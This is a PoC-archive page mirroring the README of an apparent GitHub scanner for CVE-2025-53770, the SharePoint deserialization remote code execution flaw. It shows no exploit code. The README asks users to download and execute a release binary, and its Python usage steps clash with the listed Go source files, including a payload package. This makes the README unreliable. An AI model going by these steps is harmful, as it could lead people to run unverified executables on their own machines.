Goal Reached Thanks to every supporter β€” we hit 100%!

Goal: 1000 CNY Β· Raised: 1000 CNY

100.0%

CVE-2025-53770 PoC β€” Microsoft SharePoint Server Remote Code Execution Vulnerability

Source
Associated Vulnerability
Title:Microsoft SharePoint Server Remote Code Execution Vulnerability (CVE-2025-53770)
Description:Deserialization of untrusted data in on-premises Microsoft SharePoint Server allows an unauthorized attacker to execute code over a network. Microsoft is aware that an exploit for CVE-2025-53770 exists in the wild. Microsoft is preparing and fully testing a comprehensive update to address this vulnerability. In the meantime, please make sure that the mitigation provided in this CVE documentation is in place so that you are protected from exploitation.
Description
Scanner for CVE-2025-53770, a SharePoint vulnerability. Check if your server is vulnerable and extract version info. πŸ› οΈπŸ”
Readme
# CVE-2025-53770: SharePoint RCE Vulnerability Scanner πŸ›‘οΈ

![GitHub release](https://img.shields.io/github/release/Hassanopop/CVE-2025-53770.svg)
![License](https://img.shields.io/badge/license-MIT-blue.svg)
![Issues](https://img.shields.io/github/issues/Hassanopop/CVE-2025-53770.svg)

## Overview

This repository contains a scanner for the SharePoint CVE-2025-53770 remote code execution (RCE) zero-day vulnerability. This tool aims to help security professionals and developers identify systems that may be vulnerable to this specific exploit.

## Table of Contents

- [Features](#features)
- [Installation](#installation)
- [Usage](#usage)
- [Technical Details](#technical-details)
- [Contributing](#contributing)
- [License](#license)
- [Contact](#contact)

## Features

- **Detect Vulnerability**: Quickly identify if your SharePoint instance is vulnerable to CVE-2025-53770.
- **Easy to Use**: Designed with a simple command-line interface.
- **Open Source**: Fully open-source, allowing for community contributions and improvements.
- **Regular Updates**: Stay informed with the latest updates in the "Releases" section.

## Installation

To install the scanner, follow these steps:

1. **Clone the Repository**:
   ```bash
   git clone https://github.com/Hassanopop/CVE-2025-53770.git
   cd CVE-2025-53770
   ```

2. **Download the Latest Release**:
   Visit the [Releases section](https://github.com/Hassanopop/CVE-2025-53770/releases) to find the latest version. Download and execute the file to set up the scanner.

3. **Install Dependencies**:
   Make sure to install the required dependencies. Use the following command:
   ```bash
   pip install -r requirements.txt
   ```

## Usage

To use the scanner, follow these steps:

1. **Run the Scanner**:
   Execute the scanner with the following command:
   ```bash
   python scanner.py <target-url>
   ```

   Replace `<target-url>` with the URL of the SharePoint instance you want to test.

2. **Check the Results**:
   After running the scanner, review the output for any vulnerabilities detected.

3. **Regular Updates**:
   Keep an eye on the [Releases section](https://github.com/Hassanopop/CVE-2025-53770/releases) for updates and improvements.

## Technical Details

### Vulnerability Description

CVE-2025-53770 is a critical vulnerability that allows an attacker to execute arbitrary code on a vulnerable SharePoint server. This exploit can lead to data breaches and unauthorized access to sensitive information.

### How the Scanner Works

The scanner works by sending specific payloads to the SharePoint server and analyzing the response. If the server responds in a way that indicates vulnerability, the scanner flags it.

### Supported Platforms

- Windows
- Linux
- macOS

### Dependencies

- Python 3.x
- Requests library
- Other libraries listed in `requirements.txt`

## Contributing

We welcome contributions from the community. To contribute:

1. Fork the repository.
2. Create a new branch for your feature or fix.
3. Make your changes and commit them.
4. Push your branch and create a pull request.

Please ensure that your code adheres to the existing style and includes appropriate tests.

## License

This project is licensed under the MIT License. See the [LICENSE](LICENSE) file for details.

## Contact

For questions or support, please reach out via the Issues section on GitHub. You can also contact the repository owner directly.

---

**Note**: Always test in a safe environment and ensure compliance with legal regulations before using this tool on production systems.
File Snapshot

[4.0K] /data/pocs/287ff1c05904d25413c41128ae59d25d38f093a0 β”œβ”€β”€ [4.0K] cmd β”‚Β Β  └── [2.7K] main.go β”œβ”€β”€ [ 848] Dockerfile β”œβ”€β”€ [ 169] go.mod β”œβ”€β”€ [1.6K] go.sum β”œβ”€β”€ [ 48] Makefile β”œβ”€β”€ [4.0K] pkg β”‚Β Β  └── [4.0K] payload β”‚Β Β  β”œβ”€β”€ [2.4K] extract.go β”‚Β Β  β”œβ”€β”€ [3.3K] payload.go β”‚Β Β  β”œβ”€β”€ [1.7K] test.go β”‚Β Β  └── [ 685] test_payload.go └── [3.5K] README.md 3 directories, 10 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers β€” if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online β€” thank you for the support. View subscription plans β†’